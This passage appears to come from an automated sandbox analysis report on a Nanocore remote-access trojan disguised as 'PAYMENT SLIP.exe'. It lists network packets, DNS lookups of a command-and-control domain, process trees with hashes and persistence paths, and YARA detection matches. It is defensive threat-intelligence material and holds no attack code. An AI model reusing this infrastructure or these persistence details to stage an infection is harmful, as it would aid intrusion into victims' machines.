            May 12, 2021 15:42:57.713758945 CEST4434970913.107.5.88192.168.2.4
            May 12, 2021 15:42:57.865374088 CEST44349698131.253.33.200192.168.2.4
            May 12, 2021 15:42:57.879708052 CEST44349697131.253.33.200192.168.2.4
            May 12, 2021 15:42:57.900304079 CEST497793030192.168.2.423.254.130.71
            May 12, 2021 15:42:58.106964111 CEST30304977923.254.130.71192.168.2.4
            May 12, 2021 15:42:58.107069016 CEST497793030192.168.2.423.254.130.71
            May 12, 2021 15:42:58.305005074 CEST497793030192.168.2.423.254.130.71
            May 12, 2021 15:42:58.321530104 CEST44349691131.253.33.200192.168.2.4
            May 12, 2021 15:42:58.323837996 CEST30304977923.254.130.71192.168.2.4
            May 12, 2021 15:42:58.323887110 CEST497793030192.168.2.423.254.130.71
            May 12, 2021 15:42:58.602288961 CEST44349700131.253.33.200192.168.2.4
            May 12, 2021 15:42:58.662959099 CEST44349694131.253.33.200192.168.2.4
            May 12, 2021 15:43:00.101985931 CEST44349693131.253.33.200192.168.2.4
            May 12, 2021 15:43:00.230305910 CEST44349696131.253.33.200192.168.2.4
            May 12, 2021 15:43:01.547537088 CEST4434971013.107.5.88192.168.2.4
            May 12, 2021 15:43:02.469707966 CEST497803030192.168.2.423.254.130.71
            May 12, 2021 15:43:02.639507055 CEST30304978023.254.130.71192.168.2.4
            May 12, 2021 15:43:02.639684916 CEST497803030192.168.2.423.254.130.71
            May 12, 2021 15:43:02.640723944 CEST497803030192.168.2.423.254.130.71
            May 12, 2021 15:43:02.829312086 CEST30304978023.254.130.71192.168.2.4
            May 12, 2021 15:43:02.829515934 CEST497803030192.168.2.423.254.130.71
            May 12, 2021 15:43:02.997417927 CEST30304978023.254.130.71192.168.2.4
            May 12, 2021 15:43:02.997576952 CEST497803030192.168.2.423.254.130.71
            May 12, 2021 15:43:03.034327030 CEST497803030192.168.2.423.254.130.71
            May 12, 2021 15:43:06.447364092 CEST804970393.184.220.29192.168.2.4
            May 12, 2021 15:43:06.447484016 CEST4970380192.168.2.493.184.220.29
            May 12, 2021 15:43:07.193496943 CEST497813030192.168.2.423.254.130.71
            May 12, 2021 15:43:07.359935999 CEST30304978123.254.130.71192.168.2.4
            May 12, 2021 15:43:07.360058069 CEST497813030192.168.2.423.254.130.71
            May 12, 2021 15:43:07.360825062 CEST497813030192.168.2.423.254.130.71
            May 12, 2021 15:43:07.542114973 CEST30304978123.254.130.71192.168.2.4
            May 12, 2021 15:43:07.544392109 CEST497813030192.168.2.423.254.130.71
            May 12, 2021 15:43:07.776108027 CEST30304978123.254.130.71192.168.2.4
            May 12, 2021 15:43:07.777949095 CEST497813030192.168.2.423.254.130.71
            May 12, 2021 15:43:07.948066950 CEST30304978123.254.130.71192.168.2.4
            May 12, 2021 15:43:07.948158979 CEST497813030192.168.2.423.254.130.71
            May 12, 2021 15:43:08.180717945 CEST30304978123.254.130.71192.168.2.4
            May 12, 2021 15:43:08.180870056 CEST497813030192.168.2.423.254.130.71
            May 12, 2021 15:43:08.401071072 CEST30304978123.254.130.71192.168.2.4
            May 12, 2021 15:43:08.402105093 CEST497813030192.168.2.423.254.130.71
            May 12, 2021 15:43:08.556814909 CEST30304978123.254.130.71192.168.2.4
            May 12, 2021 15:43:08.596877098 CEST497813030192.168.2.423.254.130.71
            May 12, 2021 15:43:08.625917912 CEST30304978123.254.130.71192.168.2.4
            May 12, 2021 15:43:08.675055981 CEST497813030192.168.2.423.254.130.71
            May 12, 2021 15:43:10.999643087 CEST497813030192.168.2.423.254.130.71
            May 12, 2021 15:43:11.227674007 CEST30304978123.254.130.71192.168.2.4
            May 12, 2021 15:43:11.229006052 CEST497813030192.168.2.423.254.130.71
            May 12, 2021 15:43:11.408246994 CEST30304978123.254.130.71192.168.2.4
            May 12, 2021 15:43:11.411412001 CEST497813030192.168.2.423.254.130.71
            May 12, 2021 15:43:11.577680111 CEST30304978123.254.130.71192.168.2.4
            May 12, 2021 15:43:11.578917027 CEST497813030192.168.2.423.254.130.71
            May 12, 2021 15:43:11.786355972 CEST30304978123.254.130.71192.168.2.4
            May 12, 2021 15:43:12.546447992 CEST30304978123.254.130.71192.168.2.4
            May 12, 2021 15:43:12.597297907 CEST497813030192.168.2.423.254.130.71

            UDP Packets

            TimestampSource PortDest PortSource IPDest IP
            May 12, 2021 15:40:56.365001917 CEST5453153192.168.2.48.8.8.8
            May 12, 2021 15:40:56.413590908 CEST53545318.8.8.8192.168.2.4
            May 12, 2021 15:40:57.462188005 CEST4971453192.168.2.48.8.8.8
            May 12, 2021 15:40:57.510945082 CEST53497148.8.8.8192.168.2.4
            May 12, 2021 15:40:58.096000910 CEST5802853192.168.2.48.8.8.8
            May 12, 2021 15:40:58.155076981 CEST53580288.8.8.8192.168.2.4
            May 12, 2021 15:40:58.895443916 CEST5309753192.168.2.48.8.8.8
            May 12, 2021 15:40:58.944289923 CEST53530978.8.8.8192.168.2.4
            May 12, 2021 15:40:59.821526051 CEST4925753192.168.2.48.8.8.8
            May 12, 2021 15:40:59.873083115 CEST53492578.8.8.8192.168.2.4
            May 12, 2021 15:41:01.446532011 CEST6238953192.168.2.48.8.8.8
            May 12, 2021 15:41:01.498163939 CEST53623898.8.8.8192.168.2.4
            May 12, 2021 15:41:02.455862045 CEST4991053192.168.2.48.8.8.8
            May 12, 2021 15:41:02.507606030 CEST53499108.8.8.8192.168.2.4
            May 12, 2021 15:41:03.504097939 CEST5585453192.168.2.48.8.8.8
            May 12, 2021 15:41:03.556497097 CEST53558548.8.8.8192.168.2.4
            May 12, 2021 15:41:08.438261032 CEST6454953192.168.2.48.8.8.8
            May 12, 2021 15:41:08.490040064 CEST53645498.8.8.8192.168.2.4
            May 12, 2021 15:41:09.995616913 CEST6315353192.168.2.48.8.8.8
            May 12, 2021 15:41:10.046076059 CEST53631538.8.8.8192.168.2.4
            May 12, 2021 15:41:11.000562906 CEST5299153192.168.2.48.8.8.8
            May 12, 2021 15:41:11.078963041 CEST53529918.8.8.8192.168.2.4
            May 12, 2021 15:41:12.131509066 CEST5370053192.168.2.48.8.8.8
            May 12, 2021 15:41:12.180249929 CEST53537008.8.8.8192.168.2.4
            May 12, 2021 15:41:13.211496115 CEST5172653192.168.2.48.8.8.8
            May 12, 2021 15:41:13.260318995 CEST53517268.8.8.8192.168.2.4
            May 12, 2021 15:41:14.317698002 CEST5679453192.168.2.48.8.8.8
            May 12, 2021 15:41:14.366503000 CEST53567948.8.8.8192.168.2.4
            May 12, 2021 15:41:23.708602905 CEST5653453192.168.2.48.8.8.8
            May 12, 2021 15:41:23.762186050 CEST53565348.8.8.8192.168.2.4
            May 12, 2021 15:41:24.810179949 CEST5662753192.168.2.48.8.8.8
            May 12, 2021 15:41:24.858977079 CEST53566278.8.8.8192.168.2.4
            May 12, 2021 15:41:26.637279987 CEST5662153192.168.2.48.8.8.8
            May 12, 2021 15:41:26.686199903 CEST53566218.8.8.8192.168.2.4
            May 12, 2021 15:41:27.852693081 CEST6311653192.168.2.48.8.8.8
            May 12, 2021 15:41:27.904263973 CEST53631168.8.8.8192.168.2.4
            May 12, 2021 15:41:27.915894985 CEST6407853192.168.2.48.8.8.8
            May 12, 2021 15:41:27.975853920 CEST53640788.8.8.8192.168.2.4
            May 12, 2021 15:41:29.517250061 CEST6480153192.168.2.48.8.8.8
            May 12, 2021 15:41:29.566082001 CEST53648018.8.8.8192.168.2.4
            May 12, 2021 15:41:30.614928961 CEST6172153192.168.2.48.8.8.8
            May 12, 2021 15:41:30.665735960 CEST53617218.8.8.8192.168.2.4
            May 12, 2021 15:41:34.259408951 CEST5125553192.168.2.48.8.8.8
            May 12, 2021 15:41:34.319515944 CEST53512558.8.8.8192.168.2.4
            May 12, 2021 15:41:41.593622923 CEST6152253192.168.2.48.8.8.8
            May 12, 2021 15:41:41.655122995 CEST53615228.8.8.8192.168.2.4
            May 12, 2021 15:41:46.336102009 CEST5233753192.168.2.48.8.8.8
            May 12, 2021 15:41:46.398098946 CEST53523378.8.8.8192.168.2.4
            May 12, 2021 15:41:51.142338037 CEST5504653192.168.2.48.8.8.8
            May 12, 2021 15:41:51.202563047 CEST53550468.8.8.8192.168.2.4
            May 12, 2021 15:41:51.428154945 CEST4961253192.168.2.48.8.8.8
            May 12, 2021 15:41:51.485519886 CEST53496128.8.8.8192.168.2.4
            May 12, 2021 15:41:55.850594044 CEST4928553192.168.2.48.8.8.8
            May 12, 2021 15:41:55.899343967 CEST53492858.8.8.8192.168.2.4
            May 12, 2021 15:41:56.742501020 CEST5060153192.168.2.48.8.8.8
            May 12, 2021 15:41:56.845690012 CEST53506018.8.8.8192.168.2.4
            May 12, 2021 15:41:57.624161005 CEST6087553192.168.2.48.8.8.8
            May 12, 2021 15:41:57.684287071 CEST53608758.8.8.8192.168.2.4
            May 12, 2021 15:41:58.659828901 CEST5644853192.168.2.48.8.8.8
            May 12, 2021 15:41:58.826293945 CEST53564488.8.8.8192.168.2.4
            May 12, 2021 15:42:00.020754099 CEST5917253192.168.2.48.8.8.8
            May 12, 2021 15:42:00.071636915 CEST53591728.8.8.8192.168.2.4
            May 12, 2021 15:42:00.509931087 CEST6242053192.168.2.48.8.8.8
            May 12, 2021 15:42:00.569497108 CEST53624208.8.8.8192.168.2.4
            May 12, 2021 15:42:00.671063900 CEST6057953192.168.2.48.8.8.8
            May 12, 2021 15:42:00.731378078 CEST53605798.8.8.8192.168.2.4
            May 12, 2021 15:42:01.064954042 CEST5018353192.168.2.48.8.8.8
            May 12, 2021 15:42:01.132759094 CEST53501838.8.8.8192.168.2.4
            May 12, 2021 15:42:01.307965994 CEST6153153192.168.2.48.8.8.8
            May 12, 2021 15:42:01.365118027 CEST53615318.8.8.8192.168.2.4
            May 12, 2021 15:42:01.830445051 CEST4922853192.168.2.48.8.8.8
            May 12, 2021 15:42:01.887847900 CEST53492288.8.8.8192.168.2.4
            May 12, 2021 15:42:02.659746885 CEST5979453192.168.2.48.8.8.8
            May 12, 2021 15:42:02.708405018 CEST53597948.8.8.8192.168.2.4
            May 12, 2021 15:42:03.681365013 CEST5591653192.168.2.48.8.8.8
            May 12, 2021 15:42:03.738527060 CEST53559168.8.8.8192.168.2.4
            May 12, 2021 15:42:04.213337898 CEST5275253192.168.2.48.8.8.8
            May 12, 2021 15:42:04.275392056 CEST53527528.8.8.8192.168.2.4
            May 12, 2021 15:42:05.186784983 CEST6054253192.168.2.48.8.8.8
            May 12, 2021 15:42:05.250067949 CEST53605428.8.8.8192.168.2.4
            May 12, 2021 15:42:08.201644897 CEST6068953192.168.2.48.8.8.8
            May 12, 2021 15:42:08.252142906 CEST53606898.8.8.8192.168.2.4
            May 12, 2021 15:42:11.425129890 CEST6420653192.168.2.48.8.8.8
            May 12, 2021 15:42:11.482409954 CEST53642068.8.8.8192.168.2.4
            May 12, 2021 15:42:18.821676016 CEST5090453192.168.2.48.8.8.8
            May 12, 2021 15:42:18.879184008 CEST53509048.8.8.8192.168.2.4
            May 12, 2021 15:42:25.091231108 CEST5752553192.168.2.48.8.8.8
            May 12, 2021 15:42:25.154309034 CEST53575258.8.8.8192.168.2.4
            May 12, 2021 15:42:31.332638025 CEST5381453192.168.2.48.8.8.8
            May 12, 2021 15:42:31.389828920 CEST53538148.8.8.8192.168.2.4
            May 12, 2021 15:42:38.191953897 CEST5341853192.168.2.48.8.8.8
            May 12, 2021 15:42:38.251568079 CEST53534188.8.8.8192.168.2.4
            May 12, 2021 15:42:39.914653063 CEST6283353192.168.2.48.8.8.8
            May 12, 2021 15:42:39.990272045 CEST53628338.8.8.8192.168.2.4
            May 12, 2021 15:42:41.877824068 CEST5926053192.168.2.48.8.8.8
            May 12, 2021 15:42:41.934930086 CEST53592608.8.8.8192.168.2.4
            May 12, 2021 15:42:44.560812950 CEST4994453192.168.2.48.8.8.8
            May 12, 2021 15:42:44.619924068 CEST53499448.8.8.8192.168.2.4
            May 12, 2021 15:42:49.266288042 CEST6330053192.168.2.48.8.8.8
            May 12, 2021 15:42:49.323539972 CEST53633008.8.8.8192.168.2.4
            May 12, 2021 15:42:54.101478100 CEST6144953192.168.2.48.8.8.8
            May 12, 2021 15:42:54.160172939 CEST53614498.8.8.8192.168.2.4
            May 12, 2021 15:43:02.405359030 CEST5127553192.168.2.48.8.8.8
            May 12, 2021 15:43:02.468023062 CEST53512758.8.8.8192.168.2.4
            May 12, 2021 15:43:07.135113955 CEST6349253192.168.2.48.8.8.8
            May 12, 2021 15:43:07.192173004 CEST53634928.8.8.8192.168.2.4

            DNS Queries

            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
            May 12, 2021 15:41:34.259408951 CEST192.168.2.48.8.8.80xaa10Standard query (0)seaudo.hopto.orgA (IP address)IN (0x0001)
            May 12, 2021 15:41:41.593622923 CEST192.168.2.48.8.8.80x15ddStandard query (0)seaudo.hopto.orgA (IP address)IN (0x0001)
            May 12, 2021 15:41:46.336102009 CEST192.168.2.48.8.8.80x49fdStandard query (0)seaudo.hopto.orgA (IP address)IN (0x0001)
            May 12, 2021 15:41:51.142338037 CEST192.168.2.48.8.8.80x7b21Standard query (0)seaudo.hopto.orgA (IP address)IN (0x0001)
            May 12, 2021 15:41:55.850594044 CEST192.168.2.48.8.8.80x1687Standard query (0)seaudo.hopto.orgA (IP address)IN (0x0001)
            May 12, 2021 15:42:00.509931087 CEST192.168.2.48.8.8.80x958cStandard query (0)seaudo.hopto.orgA (IP address)IN (0x0001)
            May 12, 2021 15:42:05.186784983 CEST192.168.2.48.8.8.80x1b63Standard query (0)seaudo.hopto.orgA (IP address)IN (0x0001)
            May 12, 2021 15:42:11.425129890 CEST192.168.2.48.8.8.80x6ee1Standard query (0)seaudo.hopto.orgA (IP address)IN (0x0001)
            May 12, 2021 15:42:18.821676016 CEST192.168.2.48.8.8.80x780aStandard query (0)seaudo.hopto.orgA (IP address)IN (0x0001)
            May 12, 2021 15:42:25.091231108 CEST192.168.2.48.8.8.80x4ab5Standard query (0)seaudo.hopto.orgA (IP address)IN (0x0001)
            May 12, 2021 15:42:31.332638025 CEST192.168.2.48.8.8.80xcf2fStandard query (0)seaudo.hopto.orgA (IP address)IN (0x0001)
            May 12, 2021 15:42:38.191953897 CEST192.168.2.48.8.8.80x9831Standard query (0)seaudo.hopto.orgA (IP address)IN (0x0001)
            May 12, 2021 15:42:44.560812950 CEST192.168.2.48.8.8.80xb990Standard query (0)seaudo.hopto.orgA (IP address)IN (0x0001)
            May 12, 2021 15:42:49.266288042 CEST192.168.2.48.8.8.80xdd77Standard query (0)seaudo.hopto.orgA (IP address)IN (0x0001)
            May 12, 2021 15:42:54.101478100 CEST192.168.2.48.8.8.80x5c0fStandard query (0)seaudo.hopto.orgA (IP address)IN (0x0001)
            May 12, 2021 15:43:02.405359030 CEST192.168.2.48.8.8.80x28cdStandard query (0)seaudo.hopto.orgA (IP address)IN (0x0001)
            May 12, 2021 15:43:07.135113955 CEST192.168.2.48.8.8.80xaa22Standard query (0)seaudo.hopto.orgA (IP address)IN (0x0001)

            DNS Answers

            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
            May 12, 2021 15:41:34.319515944 CEST8.8.8.8192.168.2.40xaa10No error (0)seaudo.hopto.org23.254.130.71A (IP address)IN (0x0001)
            May 12, 2021 15:41:41.655122995 CEST8.8.8.8192.168.2.40x15ddNo error (0)seaudo.hopto.org23.254.130.71A (IP address)IN (0x0001)
            May 12, 2021 15:41:46.398098946 CEST8.8.8.8192.168.2.40x49fdNo error (0)seaudo.hopto.org23.254.130.71A (IP address)IN (0x0001)
            May 12, 2021 15:41:51.202563047 CEST8.8.8.8192.168.2.40x7b21No error (0)seaudo.hopto.org23.254.130.71A (IP address)IN (0x0001)
            May 12, 2021 15:41:55.899343967 CEST8.8.8.8192.168.2.40x1687No error (0)seaudo.hopto.org23.254.130.71A (IP address)IN (0x0001)
            May 12, 2021 15:42:00.569497108 CEST8.8.8.8192.168.2.40x958cNo error (0)seaudo.hopto.org23.254.130.71A (IP address)IN (0x0001)
            May 12, 2021 15:42:05.250067949 CEST8.8.8.8192.168.2.40x1b63No error (0)seaudo.hopto.org23.254.130.71A (IP address)IN (0x0001)
            May 12, 2021 15:42:11.482409954 CEST8.8.8.8192.168.2.40x6ee1No error (0)seaudo.hopto.org23.254.130.71A (IP address)IN (0x0001)
            May 12, 2021 15:42:18.879184008 CEST8.8.8.8192.168.2.40x780aNo error (0)seaudo.hopto.org23.254.130.71A (IP address)IN (0x0001)
            May 12, 2021 15:42:25.154309034 CEST8.8.8.8192.168.2.40x4ab5No error (0)seaudo.hopto.org23.254.130.71A (IP address)IN (0x0001)
            May 12, 2021 15:42:31.389828920 CEST8.8.8.8192.168.2.40xcf2fNo error (0)seaudo.hopto.org23.254.130.71A (IP address)IN (0x0001)
            May 12, 2021 15:42:38.251568079 CEST8.8.8.8192.168.2.40x9831No error (0)seaudo.hopto.org23.254.130.71A (IP address)IN (0x0001)
            May 12, 2021 15:42:44.619924068 CEST8.8.8.8192.168.2.40xb990No error (0)seaudo.hopto.org23.254.130.71A (IP address)IN (0x0001)
            May 12, 2021 15:42:49.323539972 CEST8.8.8.8192.168.2.40xdd77No error (0)seaudo.hopto.org23.254.130.71A (IP address)IN (0x0001)
            May 12, 2021 15:42:54.160172939 CEST8.8.8.8192.168.2.40x5c0fNo error (0)seaudo.hopto.org23.254.130.71A (IP address)IN (0x0001)
            May 12, 2021 15:43:02.468023062 CEST8.8.8.8192.168.2.40x28cdNo error (0)seaudo.hopto.org23.254.130.71A (IP address)IN (0x0001)
            May 12, 2021 15:43:07.192173004 CEST8.8.8.8192.168.2.40xaa22No error (0)seaudo.hopto.org23.254.130.71A (IP address)IN (0x0001)

            Code Manipulations

            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            High Level Behavior Distribution

            Click to dive into process behavior distribution

            Behavior

            Click to jump to process

            System Behavior

            Analysis Process: PAYMENT SLIP.exe PID: 6804 Parent PID: 6052

            General

            Start time:15:41:03
            Start date:12/05/2021
            Path:C:\Users\user\Desktop\PAYMENT SLIP.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\Desktop\PAYMENT SLIP.exe'
            Imagebase:0x400000
            File size:259286 bytes
            MD5 hash:50C9D58F61950484825D85A9A1372A7D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.665787151.0000000002400000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.665787151.0000000002400000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.665787151.0000000002400000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000001.00000002.665787151.0000000002400000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            Reputation:low

            Chronological Activities

            Analysis Process: MSBuild.exe PID: 7012 Parent PID: 6804

            General

            Start time:15:41:09
            Start date:12/05/2021
            Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
            Wow64 process (32bit):false
            Commandline:'C:\Users\user\Desktop\PAYMENT SLIP.exe'
            Imagebase:0x70000
            File size:69632 bytes
            MD5 hash:88BBB7610152B48C2B3879473B17857E
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate

            Chronological Activities

            Analysis Process: PAYMENT SLIP.exe PID: 7116 Parent PID: 6804

            General

            Start time:15:41:13
            Start date:12/05/2021
            Path:C:\Users\user\Desktop\PAYMENT SLIP.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\Desktop\PAYMENT SLIP.exe'
            Imagebase:0x400000
            File size:259286 bytes
            MD5 hash:50C9D58F61950484825D85A9A1372A7D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.693808017.0000000003160000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000006.00000002.693808017.0000000003160000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.693808017.0000000003160000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000006.00000002.693808017.0000000003160000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            Reputation:low

            Chronological Activities

            Analysis Process: MSBuild.exe PID: 4228 Parent PID: 7116

            General

            Start time:15:41:20
            Start date:12/05/2021
            Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
            Wow64 process (32bit):false
            Commandline:'C:\Users\user\Desktop\PAYMENT SLIP.exe'
            Imagebase:0x1f0000
            File size:69632 bytes
            MD5 hash:88BBB7610152B48C2B3879473B17857E
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate

            Chronological Activities

            Analysis Process: hmhrpib.exe PID: 6024 Parent PID: 3424

            General

            Start time:15:41:21
            Start date:12/05/2021
            Path:C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe'
            Imagebase:0x400000
            File size:259286 bytes
            MD5 hash:50C9D58F61950484825D85A9A1372A7D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000002.706739434.0000000002F30000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000008.00000002.706739434.0000000002F30000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000002.706739434.0000000002F30000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000008.00000002.706739434.0000000002F30000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            Antivirus matches:
            • Detection: 100%, Joe Sandbox ML
            • Detection: 43%, ReversingLabs
            Reputation:low

            Chronological Activities

            Analysis Process: PAYMENT SLIP.exe PID: 5704 Parent PID: 7116

            General

            Start time:15:41:26
            Start date:12/05/2021
            Path:C:\Users\user\Desktop\PAYMENT SLIP.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\Desktop\PAYMENT SLIP.exe'
            Imagebase:0x400000
            File size:259286 bytes
            MD5 hash:50C9D58F61950484825D85A9A1372A7D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.723894048.00000000024E0000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.723894048.00000000024E0000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.723894048.00000000024E0000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.723894048.00000000024E0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            Reputation:low

            Chronological Activities

            Analysis Process: MSBuild.exe PID: 6372 Parent PID: 6024

            General

            Start time:15:41:28
            Start date:12/05/2021
            Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe'
            Imagebase:0xec0000
            File size:69632 bytes
            MD5 hash:88BBB7610152B48C2B3879473B17857E
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Yara matches:
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.911350836.00000000044FF000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.910500149.0000000001830000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.910500149.0000000001830000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.909856080.0000000001450000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.909856080.0000000001450000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.910512551.0000000001840000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.910512551.0000000001840000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.909818098.0000000001420000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.909818098.0000000001420000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.910417181.00000000017D0000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.910417181.00000000017D0000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.914312313.00000000061A0000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.914312313.00000000061A0000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.914312313.00000000061A0000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.910472948.0000000001810000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.910472948.0000000001810000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.909835016.0000000001430000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.909835016.0000000001430000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.911646592.000000000485A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.910378079.00000000017A0000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.910378079.00000000017A0000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.910442224.00000000017F0000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.910442224.00000000017F0000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.910984817.00000000034F4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.910406423.00000000017C0000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.910406423.00000000017C0000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.910536260.0000000001870000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.910536260.0000000001870000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.912631638.0000000005810000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.912631638.0000000005810000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.910428872.00000000017E0000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.910428872.00000000017E0000.00000004.00000001.sdmp, Author: Florian Roth
